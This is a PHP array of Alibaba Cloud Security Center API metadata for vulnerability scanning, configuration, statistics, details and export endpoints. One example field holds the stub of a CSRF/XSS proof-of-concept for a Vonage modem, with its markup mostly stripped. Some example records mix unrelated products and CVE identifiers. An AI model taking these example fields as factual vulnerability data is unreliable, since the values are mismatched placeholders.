[ 'summary' => 'Queries the status information about vulnerability scan tasks on a server.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'TaskIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The task IDs.'."\n", 'type' => 'array', 'items' => ['description' => 'The ID of the task.'."\n", 'type' => 'string', 'required' => false, 'example' => 'ad8afca3914a5fff4636e67f18e259c7', 'title' => ''], 'required' => false, 'docRequired' => true, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'Types', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The types of the vulnerabilities that are detected by the tasks.'."\n", 'type' => 'array', 'items' => ['description' => 'The type of the vulnerability. Valid values:'."\n" ."\n" .'* **cve**: Linux software vulnerabilities'."\n" .'* **sys**: Windows system vulnerabilities'."\n" .'* **cms**: Web-CMS vulnerabilities'."\n" .'* **sca**: vulnerabilities that are detected based on software component analysis'."\n", 'type' => 'string', 'required' => false, 'example' => 'sca', 'title' => ''], 'required' => false, 'docRequired' => true, 'maxItems' => 10, 'title' => '', 'example' => '', ], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server.'."\n", 'type' => 'string', 'required' => false, 'docRequired' => true, 'example' => '5d55af3c-35f3-4d4d-8ccc-8c5443b0****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'TotalCount' => ['description' => 'The total number of vulnerability scan tasks on the server.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request.'."\n", 'type' => 'string', 'example' => 'BE120DAB-F4E7-4C53-ADC3-A97578ABF384', 'title' => ''], 'TaskStatuses' => [ 'description' => 'An array that consists of the status information about the vulnerability scan tasks on the server.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The struct of the status information about the vulnerability scan task.'."\n", 'type' => 'object', 'properties' => [ 'TaskId' => ['description' => 'The ID of the main task.'."\n", 'type' => 'string', 'example' => '16190385', 'title' => ''], 'TaskStatusList' => [ 'description' => 'An array that consists of status information about the vulnerability scan subtask.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The struct of the status information about the vulnerability scan subtask.'."\n", 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the vulnerability. Valid values:'."\n" ."\n" .'* **cve**: Linux software vulnerability'."\n" .'* **sys**: Windows system vulnerability'."\n" .'* **cms**: Web-CMS vulnerability'."\n" .'* **sca**: vulnerability that is detected based on software component analysis'."\n", 'type' => 'string', 'example' => 'cve', 'title' => ''], 'Status' => ['description' => 'The status of the subtask. Valid values:'."\n" ."\n" .'* **0**: unhandled'."\n" .'* **1**: collecting'."\n" .'* **2**: collected'."\n" .'* **3**: matching'."\n" .'* **4**: complete'."\n", 'type' => 'string', 'example' => '4', 'title' => ''], 'Code' => ['description' => 'The error code returned.'."\n", 'type' => 'string', 'example' => 'push_command_failed', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"TotalCount\\": 1,\\n \\"RequestId\\": \\"BE120DAB-F4E7-4C53-ADC3-A97578ABF384\\",\\n \\"TaskStatuses\\": [\\n {\\n \\"TaskId\\": \\"16190385\\",\\n \\"TaskStatusList\\": [\\n {\\n \\"Type\\": \\"cve\\",\\n \\"Status\\": \\"4\\",\\n \\"Code\\": \\"push_command_failed\\"\\n }\\n ]\\n }\\n ]\\n}","type":"json"}]', 'title' => 'DescribeVulCheckTaskStatusDetail', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVulCheckTaskStatusDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeVulCheckTaskStatusDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeVulConfig' => [ 'summary' => 'Queries vulnerability management configuration information.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.', 'type' => 'string', 'required' => false, 'example' => '113.110.XX.XX', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of vulnerability management configuration. By default, all types of configurations are queried. Valid values:'."\n" .'- **cve**: Linux software vulnerability'."\n" .'- **sys**: Windows system vulnerability'."\n" .'- **cms**: Web-CMS vulnerability'."\n" .'- **app**: application vulnerability (web scanner)'."\n" .'- **emg**: emergency vulnerability'."\n" .'- **scanMode**: display real-risk vulnerabilities'."\n" .'- **imageVulClean**: vulnerability retention period'."\n" .'- **yum**: prioritize Alibaba Cloud sources for vulnerability fixing.', 'type' => 'string', 'required' => false, 'example' => 'cve', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The vulnerability management configuration information.', 'type' => 'object', 'properties' => [ 'TotalCount' => ['description' => 'The total number of configuration entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'RequestId' => ['description' => 'The request ID. It is a unique identifier generated by Alibaba Cloud for the request and can be used to troubleshoot issues.', 'type' => 'string', 'example' => '24A20733-10A0-4AF6-BE6B-E3322413BB68', 'title' => ''], 'TargetConfigs' => [ 'description' => 'The list of vulnerability management configurations.', 'type' => 'array', 'items' => [ 'description' => 'The vulnerability management configuration.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of vulnerability management configuration. Valid values:'."\n" .'- **cve**: Linux software vulnerability'."\n" .'- **sys**: Windows system vulnerability'."\n" .'- **cms**: Web-CMS vulnerability'."\n" .'- **app**: application vulnerability (web scanner)'."\n" .'- **emg**: emergency vulnerability'."\n" .'- **scanMode**: display real-risk vulnerabilities'."\n" .'- **imageVulClean**: vulnerability retention period'."\n" .'- **yum**: prioritize Alibaba Cloud sources for vulnerability fixing.', 'type' => 'string', 'example' => 'cve', 'title' => ''], 'OverAllConfig' => ['description' => 'The global switch. Valid values:'."\n" ."\n" .'- **off**: Disabled.'."\n" .'- **on**: Enabled.', 'type' => 'string', 'example' => 'on', 'title' => ''], 'Config' => ['description' => 'The vulnerability scanning configuration.'."\n" ."\n" .'> If type is **cve**, **sys**, **cms**, **app**, **emg**, or **yum**, valid values are:'."\n" .'> - **on**: Enabled.'."\n" .'> - **off**: Shutdown.'."\n" .'> '."\n" .'> If type is **scanMode**, valid values are:'."\n" .'> - **real**: Display real-risk vulnerabilities.'."\n" .'> - **all**: All vulnerabilities.'."\n" .'>'."\n" .'> If type is **imageVulClean**, this value indicates the vulnerability retention period in days.', 'type' => 'string', 'example' => '90', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query vulnerability management configuration', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVulConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeVulConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"TotalCount\\": 10,\\n \\"RequestId\\": \\"24A20733-10A0-4AF6-BE6B-E3322413BB68\\",\\n \\"TargetConfigs\\": [\\n {\\n \\"Type\\": \\"cve\\",\\n \\"OverAllConfig\\": \\"on\\",\\n \\"Config\\": \\"90\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeVulDefendCountStatistics' => [ 'summary' => 'Queries the vulnerability prevention statistics of a Security Center user.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '221262', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], ], 'parameters' => [ [ 'name' => 'VulType', 'in' => 'query', 'schema' => ['description' => 'The type of vulnerability to query. Valid values:'."\n" ."\n" .'- app: application vulnerability'."\n" .'- emg: emergency vulnerability.', 'type' => 'string', 'required' => false, 'example' => 'emg', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. China Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'CE500770-42D3-442E-9DDD-156E0F9F3B45', 'title' => ''], 'RaspDefendedCount' => ['description' => 'The number of vulnerabilities that have been defended against.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'RaspDefensibleCount' => ['description' => 'The number of vulnerabilities that can be defended against.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query user vulnerability prevention statistics', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeVulDefendCountStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"CE500770-42D3-442E-9DDD-156E0F9F3B45\\",\\n \\"RaspDefendedCount\\": 10,\\n \\"RaspDefensibleCount\\": 100\\n}","type":"json"}]', ], 'DescribeVulDetails' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92245', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => true, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of vulnerability to query. Valid values:'."\n" ."\n" .'- **cve**: Linux software vulnerability'."\n" .'- **sys**: Windows system vulnerability'."\n" .'- **cms**: Web-CMS vulnerability'."\n" .'- **app**: application vulnerability'."\n" .'- **emg**: emergency vulnerability'."\n" .'- **sca**: software constituency parsing vulnerability.', 'type' => 'string', 'required' => true, 'example' => 'sca', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The vulnerability name.'."\n" .'> You can call [DescribeGroupedVul](~~DescribeGroupedVul~~) or [DescribeVulList](~~DescribeVulList~~) to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => 'SCA:ACSV-2020-052801', 'title' => ''], ], [ 'name' => 'AliasName', 'in' => 'query', 'schema' => ['description' => 'The vulnerability announcement.', 'type' => 'string', 'required' => false, 'docRequired' => false, 'example' => 'RHSA-2019:3197-Important: sudo security update', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The Alibaba Cloud account ID of the member accounts in the resource directory folder.'."\n" .'> You can invoke [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '127608589417****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use it to troubleshoot issues.', 'type' => 'string', 'example' => 'EDA40EA3-6265-5900-AD99-C83E4F109CA8', 'title' => ''], 'Cves' => [ 'description' => 'The list of vulnerability details.', 'type' => 'array', 'items' => [ 'description' => 'The vulnerability details.', 'type' => 'object', 'properties' => [ 'Summary' => ['description' => 'The summary of the vulnerability.', 'type' => 'string', 'example' => 'Chanjet T-Plus is an Internet business management software. There is an unauthorized access vulnerability in one of its interfaces disclosed on the Internet. Attackers can construct malicious requests to upload malicious files to execute arbitrary code and control the server.', 'title' => ''], 'Complexity' => ['description' => 'The difficulty of exploiting the vulnerability. Valid values:'."\n" ."\n" .'- **LOW**: low'."\n" .'- **MEDIUM**: medium'."\n" .'- **HIGH**: high.', 'type' => 'string', 'deprecated' => true, 'example' => 'LOW', 'title' => ''], 'Product' => ['description' => 'The product affected by the vulnerability.', 'type' => 'string', 'deprecated' => true, 'example' => 'Log4j2', 'title' => ''], 'PocCreateTime' => ['description' => 'The timestamp when the proof of concept (POC) was created. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'deprecated' => true, 'example' => '1554189334000', 'title' => ''], 'CveId' => ['description' => 'The CVE ID.', 'type' => 'string', 'example' => 'CVE-2019-9167', 'title' => ''], 'CnvdId' => ['description' => 'The China National Vulnerability Database (CNVD) ID.', 'type' => 'string', 'deprecated' => true, 'example' => 'CNVD-2019-9167', 'title' => ''], 'Reference' => ['description' => 'The reference link for the vulnerability in the Alibaba Cloud vulnerability database.', 'type' => 'string', 'example' => 'https://example.com', 'title' => ''], 'CvssScore' => ['description' => 'The CVSS score of the vulnerability in the Alibaba Cloud vulnerability database.', 'type' => 'string', 'example' => '10.0', 'title' => ''], 'Vendor' => ['description' => 'The vendor that disclosed the vulnerability.', 'type' => 'string', 'deprecated' => true, 'example' => 'Apache', 'title' => ''], 'PocDisclosureTime' => ['description' => 'The timestamp when the POC was disclosed. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'deprecated' => true, 'example' => '1554189334000', 'title' => ''], 'Classify' => ['description' => 'The classification of the vulnerability.', 'type' => 'string', 'example' => 'remote_code_execution', 'title' => ''], 'CvssVector' => ['description' => 'The CVSS score vector.', 'type' => 'string', 'example' => 'AV:N/AC:L/Au:N/C:C/I:C/A:C', 'title' => ''], 'VulLevel' => ['description' => 'The severity level of the vulnerability. Valid values:'."\n" ."\n" .'- **serious**: critical'."\n" .'- **high**: high'."\n" .'- **medium**: medium'."\n" .'- **low**: low.', 'type' => 'string', 'example' => 'serious', 'title' => ''], 'ReleaseTime' => ['description' => 'The timestamp when the vulnerability was disclosed in the Alibaba Cloud vulnerability database. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1554189334000', 'title' => ''], 'Title' => ['description' => 'The title of the vulnerability announcement.', 'type' => 'string', 'example' => 'Chanjet T-Plus SetupAccount/Upload. Aspx file upload vulnerability(CNVD-2022-60632)', 'title' => ''], 'Solution' => ['description' => 'The remediation suggestion for the vulnerability.', 'type' => 'string', 'example' => '

At present, Chanjet has urgently released a vulnerability patch to fix the vulnerability. CNVD recommends affected units and users to upgrade to the latest version immediately:

https://www.chanjetvip.com/product/goods/goods-detail?id=53aaa40295d458e44f5d3ce5

At the same time, organizations and users affected by the vulnerability are requested to immediately follow the steps below to conduct self-inspection and repair work:

  1. User self-check steps:↵
    Check whether website/bin/load.aspx.cdcab7d2.compiled, website/bin/App_Web_load.aspx.cdcab7d2.dll, and tplus/Load.aspx files exist locally. If they exist, it means that they have been poisoned, and you must reinstall the system and install the product. patch.

  2. Non-poisoned users please:↵
    1) Update the latest product patch.↵
    2) Install anti-virus software and update the virus database in time.↵
    3) Upgrade the lower version of IIS and Nginx to IIS10.0 and Windows 2016.↵
    4) Local installation customers need to confirm whether the backup file is complete as soon as possible, and do off-site backup. Customers on the cloud should enable the mirroring function in time.↵
    5) Users who fail to update the patch in time can contact Chanjet technical support and take temporary preventive measures such as deleting files.

  3. Poisoned users please:↵
    1) Check whether the server has taken regular snapshots or backups. If so, you can restore data through snapshots or backups.↵
    2) Contact Chanjet technical support to confirm whether it has the conditions and operation methods to restore data from backup files.

If you have any technical problems, please contact Chanjet technical support: 4006600566-9

', 'title' => ''], 'Content' => ['description' => 'The content of the CVE.', 'type' => 'string', 'deprecated' => true, 'example' => 'Apache Shiro is a user authentication and authorization framework for a wide range of rights management applications.↵Recently, Apache Shiro released version 1.7.0, which fixes the Apache Shiro authentication bypass vulnerability (CVE-2020-17510).↵Attackers can bypass Shiro\'s authentication using malicious requests containing payloads.↵↵Related bugs:↵CVE-2020-17510 Shiro < 1.7.0 Validation Bypass Vulnerability↵CVE-2020-13933 Shiro < 1.6.0 Validation Bypass Vulnerability↵CVE-2020-11989 Shiro < 1.5.3 Validation Bypass Vulnerability↵CVE-2020-1957 Shiro < 1.5.2 Validation Bypass Vulnerability↵CVE-2016-6802 Shiro < 1.3.2 Validation Bypass Vulnerability'."\n" .'Check whether the fastjson version currently running on the system is in the affected version and whether safeMode is configured to disable autoType. If it is in the affected version and safeMode is not configured to disable autoType, the vulnerability is considered to exist.', 'title' => ''], 'Poc' => ['description' => 'The content of the POC.', 'type' => 'string', 'deprecated' => true, 'example' => 'NewDomain.html'."\n" .'The x and y values will need to be changed accordingly'."\n" .''."\n" .'

Authenticated Stored CSRF/XSS - Vonage Modem

'."\n" .'
'."\n" .''."\n" .''."\n" .''."\n" .''."\n" .''."\n" .''."\n" .''."\n" .''."\n" .''."\n" .''."\n" .''."\n" .''."\n" .''."\n" .''."\n" .''."\n" .'
'."\n" .''."\n" .' '."\n" .'NewKeyword.html'."\n" .'The x and y values will need to be changed accordingly'."\n" .''."\n" .'

Authenticated Stored CSRF/XSS - Vonage Modem

'."\n" .'
'."\n" .''."\n" .''."\n" .''."\n" .''."\n" .''."\n" .''."\n" .''."\n" .''."\n" .''."\n" .''."\n" .''."\n" .''."\n" .''."\n" .''."\n" .''."\n" .'
'."\n" .'', 'title' => ''], 'Classifys' => [ 'description' => 'The list of vulnerability classifications.', 'type' => 'array', 'items' => [ 'description' => 'The vulnerability classification details.', 'type' => 'object', 'properties' => [ 'Description' => ['description' => 'The description of the vulnerability classification.', 'type' => 'string', 'example' => 'privilege escalation', 'title' => ''], 'Classify' => ['description' => 'The classification of the vulnerability.', 'type' => 'string', 'example' => 'remote_code_execution', 'title' => ''], 'DemoVideoUrl' => ['description' => 'The URL of the vulnerability demo video.', 'type' => 'string', 'example' => 'https://example.com', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'OtherId' => ['description' => 'The vulnerability ID.', 'type' => 'string', 'example' => 'CVE-2020-8597', 'title' => ''], 'InstanceName' => ['description' => 'The name of the server instance.'."\n" .'> This field is deprecated. To query instances affected by the vulnerability, call [DescribeVulList](~~DescribeVulList~~).', 'type' => 'string', 'deprecated' => true, 'example' => 'sql-test-001', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.'."\n" .'> This field is deprecated. To query instances affected by the vulnerability, call [DescribeVulList](~~DescribeVulList~~).', 'type' => 'string', 'deprecated' => true, 'example' => '47.114.XX.XX', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.'."\n" .'> This field is deprecated. To query instances affected by the vulnerability, call [DescribeVulList](~~DescribeVulList~~).', 'type' => 'string', 'deprecated' => true, 'example' => '172.19.XX.XX', 'title' => ''], 'TargetId' => ['description' => 'The ID of the scan target.'."\n" .'> This field is deprecated. To query instances affected by the vulnerability, call [DescribeVulList](~~DescribeVulList~~).', 'type' => 'string', 'deprecated' => true, 'example' => 'm-bp17m0pc0xprzbwo****', 'title' => ''], 'TargetName' => ['description' => 'The name of the scan target.'."\n" .'> This field is deprecated. To query instances affected by the vulnerability, call [DescribeVulList](~~DescribeVulList~~).', 'type' => 'string', 'deprecated' => true, 'example' => 'frontend', 'title' => ''], 'CveLink' => ['description' => 'The link to the CVE vulnerability details.', 'type' => 'string', 'example' => 'https://avd.aliyun.com/detail/CVE-2022-1184', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'InnerError', 'errorMessage' => 'InnerError', 'description' => ''], ['errorCode' => 'DataExists', 'errorMessage' => '%s data exist', 'description' => ''], ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ['errorCode' => 'MissingType', 'errorMessage' => 'Type is mandatory for this action.', 'description' => ''], ['errorCode' => 'MissingName', 'errorMessage' => 'Name is mandatory for this action.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Query vulnerability details', 'summary' => 'Queries vulnerability details.', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '30', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVulDetails'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeVulDetails', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"EDA40EA3-6265-5900-AD99-C83E4F109CA8\\",\\n \\"Cves\\": [\\n {\\n \\"Summary\\": \\"Chanjet T-Plus is an Internet business management software. There is an unauthorized access vulnerability in one of its interfaces disclosed on the Internet. Attackers can construct malicious requests to upload malicious files to execute arbitrary code and control the server.\\",\\n \\"Complexity\\": \\"LOW\\",\\n \\"Product\\": \\"Log4j2\\",\\n \\"PocCreateTime\\": 1554189334000,\\n \\"CveId\\": \\"CVE-2019-9167\\",\\n \\"CnvdId\\": \\"CNVD-2019-9167\\",\\n \\"Reference\\": \\"https://example.com\\",\\n \\"CvssScore\\": \\"10.0\\",\\n \\"Vendor\\": \\"Apache\\",\\n \\"PocDisclosureTime\\": 1554189334000,\\n \\"Classify\\": \\"remote_code_execution\\",\\n \\"CvssVector\\": \\"AV:N/AC:L/Au:N/C:C/I:C/A:C\\",\\n \\"VulLevel\\": \\"serious\\",\\n \\"ReleaseTime\\": 1554189334000,\\n \\"Title\\": \\"Chanjet T-Plus SetupAccount/Upload. Aspx file upload vulnerability(CNVD-2022-60632)\\",\\n \\"Solution\\": \\"

At present, Chanjet has urgently released a vulnerability patch to fix the vulnerability. CNVD recommends affected units and users to upgrade to the latest version immediately:

https://www.chanjetvip.com/product/goods/goods-detail?id=53aaa40295d458e44f5d3ce5

At the same time, organizations and users affected by the vulnerability are requested to immediately follow the steps below to conduct self-inspection and repair work:

  1. User self-check steps:↵
    Check whether website/bin/load.aspx.cdcab7d2.compiled, website/bin/App_Web_load.aspx.cdcab7d2.dll, and tplus/Load.aspx files exist locally. If they exist, it means that they have been poisoned, and you must reinstall the system and install the product. patch.

  2. Non-poisoned users please:↵
    1) Update the latest product patch.↵
    2) Install anti-virus software and update the virus database in time.↵
    3) Upgrade the lower version of IIS and Nginx to IIS10.0 and Windows 2016.↵
    4) Local installation customers need to confirm whether the backup file is complete as soon as possible, and do off-site backup. Customers on the cloud should enable the mirroring function in time.↵
    5) Users who fail to update the patch in time can contact Chanjet technical support and take temporary preventive measures such as deleting files.

  3. Poisoned users please:↵
    1) Check whether the server has taken regular snapshots or backups. If so, you can restore data through snapshots or backups.↵
    2) Contact Chanjet technical support to confirm whether it has the conditions and operation methods to restore data from backup files.

If you have any technical problems, please contact Chanjet technical support: 4006600566-9

\\",\\n \\"Content\\": \\"Apache Shiro is a user authentication and authorization framework for a wide range of rights management applications.↵Recently, Apache Shiro released version 1.7.0, which fixes the Apache Shiro authentication bypass vulnerability (CVE-2020-17510).↵Attackers can bypass Shiro\'s authentication using malicious requests containing payloads.↵↵Related bugs:↵CVE-2020-17510 Shiro < 1.7.0 Validation Bypass Vulnerability↵CVE-2020-13933 Shiro < 1.6.0 Validation Bypass Vulnerability↵CVE-2020-11989 Shiro < 1.5.3 Validation Bypass Vulnerability↵CVE-2020-1957 Shiro < 1.5.2 Validation Bypass Vulnerability↵CVE-2016-6802 Shiro < 1.3.2 Validation Bypass Vulnerability\\\\nCheck whether the fastjson version currently running on the system is in the affected version and whether safeMode is configured to disable autoType. If it is in the affected version and safeMode is not configured to disable autoType, the vulnerability is considered to exist.\\",\\n \\"Poc\\": \\"NewDomain.html\\\\nThe x and y values will need to be changed accordingly\\\\n\\\\n

Authenticated Stored CSRF/XSS - Vonage Modem

\\\\n
\\\\n\\\\n\\\\n\\\\n\\\\n\\\\n\\\\n\\\\\\" />\\\\n\\\\n\\\\n\\\\n\\\\n\\\\n\\\\n\\\\n\\\\n
\\\\n\\\\n \\\\nNewKeyword.html\\\\nThe x and y values will need to be changed accordingly\\\\n\\\\n

Authenticated Stored CSRF/XSS - Vonage Modem

\\\\n
\\\\n\\\\n\\\\n\\\\n\\\\n\\\\\\" / >\\\\n\\\\n\\\\n\\\\n\\\\n\\\\n\\\\n\\\\n\\\\n\\\\n\\\\n
\\\\n\\",\\n \\"Classifys\\": [\\n {\\n \\"Description\\": \\"privilege escalation\\",\\n \\"Classify\\": \\"remote_code_execution\\",\\n \\"DemoVideoUrl\\": \\"https://example.com\\"\\n }\\n ],\\n \\"OtherId\\": \\"CVE-2020-8597\\",\\n \\"InstanceName\\": \\"sql-test-001\\",\\n \\"InternetIp\\": \\"47.114.XX.XX\\",\\n \\"IntranetIp\\": \\"172.19.XX.XX\\",\\n \\"TargetId\\": \\"m-bp17m0pc0xprzbwo****\\",\\n \\"TargetName\\": \\"frontend\\",\\n \\"CveLink\\": \\"https://avd.aliyun.com/detail/CVE-2022-1184\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeVulExportInfo' => [ 'summary' => 'Queries the progress of a vulnerability export task.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], ], 'parameters' => [ [ 'name' => 'ExportId', 'in' => 'query', 'schema' => ['description' => 'The ID of the vulnerability export task.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '14356', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['title' => '', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'description' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response data of the export task.', 'type' => 'object', 'properties' => [ 'Link' => ['description' => 'The download link of the exported Excel file.', 'type' => 'string', 'example' => 'http://www.aliyun.com', 'title' => ''], 'Progress' => ['description' => 'The export progress percentage (%).', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each API request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '4C1AE3F3-18FA-4108-BXXX-AFA1A032756C', 'title' => ''], 'CurrentCount' => ['description' => 'The number of data entries that have been exported.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Message' => ['description' => 'The message about the export result. Fixed value: **success**. This value indicates that the export is successful.', 'type' => 'string', 'example' => 'success', 'title' => ''], 'FileName' => ['description' => 'The name of the exported Excel file.', 'type' => 'string', 'example' => 'app_20210917', 'title' => ''], 'TotalCount' => ['description' => 'The total number of data entries in the exported Excel file.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'ExportStatus' => ['description' => 'The status of the export task. Valid values:'."\n" ."\n" .'- **init**: initializing'."\n" .'- **exporting**: exporting in progress'."\n" .'- **success**: export successful.', 'type' => 'string', 'example' => 'success', 'title' => ''], 'Id' => ['description' => 'The ID of the vulnerability export task.', 'type' => 'integer', 'format' => 'int64', 'example' => '14356', 'title' => ''], ], 